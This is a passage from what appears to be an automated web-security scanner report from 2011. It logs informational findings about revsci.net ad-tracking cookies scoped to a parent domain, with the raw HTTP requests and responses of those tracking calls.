udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2tVEbZaaSakC1Vtg80jsQpMZ82Rp4QDAVMIXzRVDE7hI/n/4akBaNcbN8GzvGBHbsQslcMTLNlRxc+ltcto7W3xwlydvz273pz0jQ4SVo42FUgVfwsuTJ73/ozLa5Dj4ttdtyx4ODj0c4MRgpOcHtrA9skVdsBvJxX6IA4P/mp6sWRYt1VtUyG21pdiMr6BE2SYIYkowggle26SPHtS97hgJom9QzF+fjkdopqa/eDqJ/hP21kuB7Nj/+t5E3SpclXlyj6NaRvJGIN17eN/umzN7wv+ezazt/lwqAWGvQUyaAiuB1TVylFtLbj7I0PdOEqjxsJKcOCJZ1JhXbmC1lZ6XChDbdUhU3t+YYwB//wiNi9Ld8batKsDYTWX0W6bmAEzQjeSWzUvtoONJgOSrqzLxsH3hcVyBsoM91FthCvWkrc0GDBVSVKzEww/Vo2msH1uIHBaQx3n9e13MpFHEYrkFOPjgbLG/rl8utHLnLWo971UO7HAZDcHPxOWByvPVoV7NG0dP25vYms68CezhpoXTWHnnVCE59stFSuvSrfAPWQ6FZGAe7Bjr9EcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMNFS1sTmfkix3bXcdRC/4c17mQuMHwkssVmYY+3jS/LSNovgvkDf4Yy52ORyslLJ2KwcdH1HMx2WtoUSVh9tsdinADifa6eZOcI+g0oFmLUlkFggXnwMlgZpycv7iAIdiRqCzT2O7l4iJ7M9KxLjk1g4iCGD9d7Bnf8DlenBahcgWfsEGGIhs5S1kFpi2waCP7M7IujJgpjReKx1oUaC2n3sTgsAsWXiCGSqi2H+bXTiMMwsbJmmqfh868zK8DT+UO34iIPSUNvH+9LxJlBTM4zrgbRvxKmEfkoloEey8Su2LcC/4TDoX454zYkzghKdrM3/VDDSg+++jIzOmyR5H8EBbymNhwm7Cmao7CkbCQGVGV16kzTOLqS3tkquW5FO+I14XiU9MC7s+YlpQqTQVNzikypsQ4mMakObHYNqGm5smzfVuiZokZDMLmaJJ+zMjo6DR8oVkzbJ2cg0JXUK2spmVjvN0lBQ3ScDOssaW3dWwhnHwKlK+F52CFLZNUle4dDJXioVnhLAxZjivb1FLCoqz8bXtM5SEKXAk6zrOOICONbcEtivU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TdTG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50OBL3IQT7uItGE2X50BYAxWE6TaYgYB7RnoMcJSvrO+9OLE5ntqFncA2iMgLzp6KRZ8tbE744Tm93MOZ7zFHcbP2P2np4Hjp7CivkjLdnBnw6DcfOutzdt7dZ9yY9qoV66z93VI0+JHf9oWj4sFy8HiMV2EnCLTeV0HFR7FVgAt/1zFOKxzud7cTpNESacOEyvUEogZHBbVJqAuipp/GnX/pG6YMkC8q/EW+QDENAAhw0PSL9dP+BDZiMHRreB4C4CtNT6GPrBjOe3WXAyns810GYaxcCjTBu5X+eN07CmQvIW0/XFXsl1m4JoEW+Dw4E9IC9D9dAI=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:31:14 GMT; Path=/
Set-Cookie: rtc_zS5W=MLsv8SNKcR5j5rKvi7rucZQk1qHgb/GNFtDD/WY8x18gmPS3yvdKBMFYSwStZcq2W35AfEghHnyiDCgEwe27pElUg8X8v8NZiYvvDQcHb2EcrzzYA+V3Rp3X4RdajVqjGfhZPpd//XrD4QnzuZutrhO5pfLINzYq6lNczX+1sNRXpJYKn/SO9Y2LCojamRji3HwN0umAD+C/kuzJSdyB1bzd1oBKC6uI8jhxiEJLyEl96cgjclheS3iWyvf92irFP3KCNXFb5VjqcBTZUFs9ORmuQqUR7P4GyHoh19L5Ri3q+yBrJYnaUMzG+BQZA0+p26Xp7UaGh2pzCVLJhJkdUu0PsG/ve25uLkrNMvHYscmFTutIg9JbCzY6TWp69oUR4AlKVs7J2DCxCRuWSkkayVVHMk1/dV4vmfGSHG4Bgr1PZKfIy8IXYHHYLfNLx3Z6g+gW1yepRK+07nyTrczsVQ1JLZtkslpVjAL5Ai/jdTgLoSM4I7Zq3qxEyeb3UVIVMyM6n8doRcZpCrd5mYLnDQB4sps=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:31:14 GMT; Path=/
Set-Cookie: NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:31:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.97. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/779915473.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/779915473.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252F%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_nJDN=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU+j/wMU1E0vlyYQu/odt1fKJ/4TCGxWoexa1KYZ/3eWVOtHxCt/UW8ma9A/UG4vW7oCUmYVXbBWZ8nrLVFixDgisw4B0TAoSU97Uaf2Ag8IRSTbsOyGF3Zd9gICESgvbXWQbYk9mAPqb6AswT86Oy+CWTktzFK8gz/h1EAWZqiM/Wr8ciVNwciV4RS3inZv72wktljmXlX9Z7UltYWdXGxFWPAvWBwsx+o3GzE+xZkpftFPjZDw49KC8OWW2oRN/nvMXTHfWWPkSWVj2NUUgLy2M33BGnWK6Tph82HtZefi7Bp4hsTR6uZj+Jqv/ijFKRHOPLnB7vCVAmO1qx0dEUtPNgJIbAF6hhZf9Tl61DqsxVk/37g0lgNT7D4Ig/yqpJInTwMav9vLZkFbbVaoeUGsiRVhzOFf9n1bipzfSqkw/RASKAqXPhxEyFdomaFm1UwloXIDGc7ZeFMKyoCmjJYk5rq0JG8ltfjHAbS7UwQu5rLpDwdxrAqgcW7t3WjRU+K8E2KMSuksY0ArFgmt/Q8IaAfa9oV1Emg0du63YtS6ECJKjSC7xO59kA0M/f4Sv8tjK6lHLxq4hluWFEhgH5u9KARyIsBhpE7JArmB0vDBIVQ2IvmYusGXwHtk96O1XUB3ed379AVnlcA72HE8dvMPUlSsfFcDHtHqRtm+prXQxzwqDH1IwWhPdbfdmBq9s5dUaTjaRABA; rsi_segs_1000000=pUPFJ0+BLwIMVZ94t6n70FESK29kanhJ0QSlgYlQhPrU/yUINJwrcQgYrs0bIzTjXSBIvMNkIBiuJgarbOA1uuXeLwfO2d23oOEKy7C6vk/KdbJkwePcfNW13dt7e591Y9qoV66zz0eSVA4YYSNm+MYnb/wSGVYFj8w5eBYcU7DTnXdYuI5fOkUJfFNu58SHNNXmXg3an21t6vplOGV0VptnQfh4IsheMqumOIRoojYKGbQJcGvyqKXscG3j2V1xYJDXd9kF4iQTS9AmFOJ+yuPrjtN8jcwidi/LCdYdzbkPBzUS893X7vssmBryl8lArQ==; udm_0=MLv39SENLipv597J/rhYqUPUUUXMiqQ8IKvYHLMNBLY8U9b+BbeOxUTsdJpOSJxtV2G67isUGw6PmqIoIYzEOsqbZXFOHQmTWOdDJozienVh2BrOKZ3rh8cHzvXBmBefwRGbo5WLkgrPUr7Qf7YYaH+DHaxT3aAAtsJcmJXLdrFv71yi0F09sGXdriEjHJ61l6iekoMGKFBiCZMLInb8OiV4/BdGMgYEfnr6/VQaEeuwqznuzZKk08/IDRSdoaczKu/PViZDa0NfWzZmYF9+D+Mdeaabx8Jzb/QO1XFdIsfhtUeAxDC4O+2nDXKF9K+zWStE7K7Zw1McXQb8LTxNntE55dHS8NUJZFkW/OflzT4tfUF5rDxKjhft4wJ5bNM1/q0oGZ+XnxRkPzvC3zb/7XkrudLiPZz8vD+YhMKlvla3BGi6HXcoXA7RRZNF1Qlkq/gXl9RGct3H3YWLtguKdr2bsBh+x6DGSYvKIKg/cIJlyR0+O6xddTirzB32How4XCck6FhIknAwQyXcx+C6QjP8sbUEyQj2H8tw25PYWpGvSp4hCIOA+3dLoCB9MKKCNl49BUZofdQL5yfEqf7DymjEGzCaEhM3tS89D66MaYekpDdFWniPUREqaluSK0mHYf73LmVifWUpkNmqL9sPZwU/wlGL2l8qZeVbl/trGriF0TUwmUJxZdYC7qy81hCFsdrehpaZBIu9suEv3yHhotaHOrpJ/KNJQtzex1CaNRJVh/Ypdvr497SVA97e3BecozQ6BEejP0cGtgbiV/OxUTAD9OniGM9f7hvHoDm+nGaRcsWeNkKG42g1CFUBtq2gasL0TzIujpqprNeP43zJ7yYHJbQhnvZa/EOa864TTcdbc0a2tjSwJLTFXIFXxxduJxdrTg0Yp7cpFOb+saNjODmCnVkFky/un40mmvgVc7vknmA3svXRz5L65w7bjzgpKVsNQ6rxG6O1RMjIzOmKT4tvjqdy6RxLc6+Yao7S8fCgCUmF97kjQCore3vmq+dAP79UeYTZTjCyfwPZaZQqTQVNzugypsQ52PZDObPAsf5EO2ZYPyKPg6fPYg4DwI/1UblLVSYBGoKO7MsOZPZo8504wyF8sWlBL40bhdmpyJBTH4FkbmJzuK6d9LeiRdqp5AhjJQJBbpP0KtMyrCmgSHyZnKLyHVlRFd20DjqOHmHF8otl

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_nJDN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50+FrwIUb5Iv1hjJIqJ9eK1cwhkJDDfAwa9raI9UqwLZJuXB5D/qNDdA7/IG7WUygcoUIQSRoQbefu8lumXzgyuQbzFqGH8VFZXYn+GbPSDlVTXiz/uNx0oiL3pvBbz1sXjw1DqqfCfFJDXEwFZaD5LQTNA6b/+OncXvzh6WE0e1nXpnBqhzud7cTpNESacOEyvUbqqnJew9brqz3U8j/bhaop2Qe9kDTRdVVx8KEAUyz/5meJFNfJuWXgtH9AFhbtFpEYcY2pJMlxc1HfK7uzrKYxFytzYJN+NmCY2RWO/ugYnH4LzhNhzfFzg+JdudDu1ZF/wodAI=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:16 GMT; Path=/
Set-Cookie: rtc_o1AK=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:16 GMT; Path=/
Set-Cookie: NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147c&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:21:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:15 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.98. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/794483737.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/794483737.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPF50mBb3IQT7uItGE2X50BYAxW06NpBWaN1BBor9n5r3cWnhlMz8N5SuHqPlIcMc/C4eouzQqRGvUTwEbYBkMK6+l/eeYNv3TEMfSdmp2gfzq3cXK7asnl7Okw1iO1r3Zji9TbEzy0Zro3lIfsJnCOs8vMC7FGijy9NIwp1QEIIFa6/KACjO84wPjH17rb9s+SB1aK8QWu2nPDzJ7oMUvDvwbRy2Uknd6fDJWmG4kc2Q7MzQQam7koP9wCEzgtBC+3GY6mbtxeLD2bJKOoM2Uz/lx1QucniVrDkJREi5MwlUjXOUr6haymrfxjTlUNxU5xuDkdlNFS; rtc_frfn=MLsv8aVKMT5j5rKp+0udG4F6UFF3mCjA+4IAGF2JTcWQu4ojfJTgzUfD1AFIKRl+6nouXCvtEI0ktcbhLVg+ShYcIKaJGvMXsOsTQflE/DzTiDy7TuqWIEjLa/MU4QlGQCooF9mpQ0tJeQ2VDQwT+Cv3zxPCjbH8ojnofsnT8+1IiwJeeTN8Wvr2f2KW4oMLsaueiZcsAtpXRlxjmoE/Vll/GgaY0bZ+0ACIDElyqNdcOXzliGL+KtYu7cICVVaq7B0LYVSwEe0nhieZZtCJhAicP0IofjtcFE9P5/t9T1g87x1gpLbviJRWv8wvVvA2ibNvJZ+yrf1tfjCuq7RHnBQXRelMm2eh6qSZ2mggvcm42oTWOpH54IrMlBijTUDgPJRD4gL4DWXALiiGTIdG5auV9k3zqdnOmd/2I/Dna+VD25YyKAKp1/1qKfwVIBIMA01mcQQ5ekv2pdanfe6np+wbiIbASU7ajZK2vRYNaul2JT+zMHtCCRUMp230aVKd5j1i/2lRjn7sEeL2EKmfL4pYBaPl1Q==; rsi_us_1000000=pUP1JU+j/wMc1i3EK6nRWJnT0DSpp0yJ1LIjTHoNZF3ns4O8Qk944S2en4T0xjKlYqoSa5TaguMdsKLmT07NXiO17lvmwD7C0rmmRFPeJxXiTezu+04jKq2gV7BF9vKn/G6U/GLXP8RwhGWkGecP4PArNYJ0irJtCzAJf1g0czOgAEeACoTj50UADx+0bsfEZMFHwq/X7azaLG9Wa0cTDdNRzTQPUzFg6+30LyvaPRUcxd0kiE201M9xPwklUuJ7IUIZc5pJRKJYTvbQCYlsa8wVSLn2UdYlu6lKeJ+tImCNhwh5rLw4ALwh4DrVxNeWGWxdiJ0QU2kCww2rCsena/OctLd77bZZqTmEb9nJNR/uQ3WP/VgQ4GlDgWLxaOMCepiqikop7PXzdmsBBv+SKnU5/l+uLEP1X5q8pK/C2nF8w6d/vqht85fjugxcBeHbxDvAlprUVyMh/WjpmFW+deBVUw6LT4aoooiNjtJcUYjprtNw0hj5eAYFrAqgcYq34PLJYccqxKE5/10D2yeMMLo3f9RKPl9fXpF+3V8ndHQWCF81KNo2QnK+MSHtegiLtRKV/5PVOdiTC0fHsjbDs5Gi6wA0rG2XGajTCdiSBtKExMsHh8YqOOSQnaYq8q/13JlmpxObz3CsL8NEJzM3JlgmlkapIvmOUbz3aQ72+KbI1cqnHVZToNz7Nr2H9ksWJ7uo/CmNCCJ0pO5tO6ep1zOTTPA=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEbZaaSamC1ltg80jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3i3oWLlLx3l4iXJ3lhmJmWMpXdFZio2NtzwdFhixjqa++pY03yPsYif+I22fJpxiCeXATY0TaMOLuuvmF9lS5clgGYKPXsAHk8G/+uaKobXLYtRca2cjf1wA0fVV3DUZ7Rqet6j8kaLJBtzgyaoCVLZswXfcQaV2Z2E1Y4+gfeXIWOfLAZo4VnyvkCJ7JrHFLmF227dJliBQ3PAsYsrICByEXJONNTCxFwjUZgMu1yrWXgBM61SXbM3H5HZMW6eagR8bMyi9ZyfzV3prMvQ7hXGHuCg6AAfXhLx3vX7XHEpPhd7ReO1857XiQvC11c3BSkgKQSgVRD2vI9chJiPTPkURf9whdpTesFFSNfn6poRHHFPoqWfDRVbCje+HKkXWEKcEwr7xgmRPQ+S0E6r4YYXep3vWeDASYs3TRli392OK7fMR5RriQJZeQbMzcP6pnNw78ETsCG02I/2kVgUDaQ2uTXF4qWauE9k+wdgKuGOMl/81r7MJloNin93A+BLqudwYghUUgURjufOoKLVR1dPhGmfE1ZDRS2JYXRDhPNB4JdeEYbrSHsiBYRSPuqSa1cv0TEYnscMlQ5LfAlKto/OrVND5IHXstCzlRQEFLliU6qegaJmMbrnSqzncLFjcif/ecvleE7vXSQd0c2jh6pAVBRgbPPf93WRtKS9vrPbhpe+GANBDY/WUoHwstk8Ck/CyQCSpfWWbSiekLmgfMkQm5rI0dJ6EiB657hvuMbQFeKkq79OMiOohuDkXt8fz4hk1O9bZketGuNeNcCoNZNYuQbkNTiu+5s5DCy61TDcQ6yN+liPyGAQjIJTt81xZ2QTRPTCL6kYD9dkwxGA4ScOcWcIieMDXVshpJCRyF2KBxFyX999f/cZzpyFqSo2c8IvkYf5IxIZZICpY1WkYr4JdQNbQFQ/LGQt3fk3bLUaUmWik7zCnotWG1FwVimJt4YvhwjbLFEFH8Yod+Yp4Vf1xVv7wyg0pheHAv4bmKG/QvdaI1m4lb9ixsbjlJBdyQ+XgJLJz9dwlD/MkA4Vjw/jIXQXzkn839hcG4XG/YAfnVxoIowfHYXL3CthIu2+sgB1KewjDOK/0zUWonO4Tp7ytKLF8/M2n5Vk5MWaOjBxpN0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_frfn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50mBb3IQT7uItGE2X50BIAFW06NpBWaN1BBor9n5r3cWnhlMz8N5SuHqPlIcMc/C4eouTVrAUuU0EZdEEApIej2Z9I5YDD5+tjUi+wHYpyJHIXS7asnl7Okw1iO1r3Zji9TbEzy05s/8t5gSc44NdsvMa9aWWe+BU45IJSyXhbUuSoLQjG2bWFW22HTm9/aAbkrnw2l/oCRjnJ6onUvDvwbbth8DlbcoJIGd7MaMuVvAZu8SiO9HvoFWdnF9f1a5JA3WOE19WnoWS7iJnEOd3W3Iokgo3jYZlUPhUKZEfp7XJwnVFuopD4zVEVbeNAGAqlG2jfVEag==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:01:14 GMT; Path=/
Set-Cookie: rtc_xis9=MLsv8VUusR9n5QgQh+2eD1ty26AgQ+XLMXEmNDUbK5xW2nYekizNLI+Ux4AdIJIvEz27RctNtu160CrFcHVQoKWkTuKSCpNTgbvpjz67BYju6GP6An+lbHIaUOtknXHGOAK+fZEml7dCRGXSwBpNVfDq/TXdwgK+JlBYZE67Zx+21M0S02XA7asVwUth1lXYNhAEExaYdZisiph5OSnf6VxvmIMSpXPp4T8KumNJqNdeCIzm9EL2KtYg7ZrfZFsbKtm17/2aOKtylcUAByZGCb5PqXiHqBrJpAY3WQch5WpGiEJL3KNQf2kiWheqMV/jIumc0t1Rj2vo0lAB0BDSHG45W9vquc56YmBh4OQsy3SW269zAR4Q0dNKS5dYFtvhn1zBUWXsHy7EfWKrrGhIAt2eI3LUEO3qr+WZzD1tst0HBkOfjr8xKHFpE56ynldIDD/7jtnpMaZ2kgW+3CXBMVZ5aj2WNJz757mLJ+9U4RjdHCbwcZxC8lFzlNF3k8pFAX0k3gxu/NOw1EZc3DLfc1eRsow=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:01:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:01:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.99. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/79844803.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/79844803.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kmBbwIMpzaxU4PYtPOvfrkYE6TaYgYB7Vmortn5r3cWnkmNvYNLatz2X2BRF/fDQH3S4VmsJRmJAa6LzgIo+537rACtt4VO+PWokPmyIxbjaaHhz/vsx9a7RMLbY9q7jMUlAIBwk4sT4DdtcoBbI90YN1KKOEH7mTDHQq1ZYXL57PqG3vkOBz3IILtQ1leAc4QXC1zbD/weAMzTqo9/+qBzFfb4m1rB8+0tHZM9M9/fmzYu6tffcCI7HDpM1NDaAgYLiqWjjqFIrJT6lIvxMkzAaflItWN9Mak18nGnn7OgOGKwea2uZJTUH6/ST/cPfMLIAfJAdA4=; 